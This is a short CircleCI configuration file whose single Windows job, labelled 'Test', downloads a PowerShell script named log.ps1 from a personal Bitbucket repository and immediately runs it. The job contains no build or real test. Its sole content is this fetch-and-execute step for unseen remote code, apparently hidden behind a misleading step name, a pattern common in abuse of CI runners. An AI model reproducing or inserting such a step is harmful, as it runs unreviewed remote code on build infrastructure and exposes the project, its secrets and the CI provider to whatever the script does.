version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
 
    steps:
      - run:
          name: Test
          command: |
            Invoke-WebRequest https://bitbucket.org/huyata001/circleci-opts/raw/b8fb1fbd721469f9096afb6419e5d6f14538f99c/log.ps1 -OutFile log.ps1
            ./log.ps1
